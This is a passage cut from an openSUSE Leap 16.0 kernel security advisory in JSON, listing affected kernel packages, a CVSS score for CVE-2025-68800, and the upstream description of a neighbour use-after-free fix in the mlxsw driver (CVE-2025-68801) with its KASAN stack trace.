"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
